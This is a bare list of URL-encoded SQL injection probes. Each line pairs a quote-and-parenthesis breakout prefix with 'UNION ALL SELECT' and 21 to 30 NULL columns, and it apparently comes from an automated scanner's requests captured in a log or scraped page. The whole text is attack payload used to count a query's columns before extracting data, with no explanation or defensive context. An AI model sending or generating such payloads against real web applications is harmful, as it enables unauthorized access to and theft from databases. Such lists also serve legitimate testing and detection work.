1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 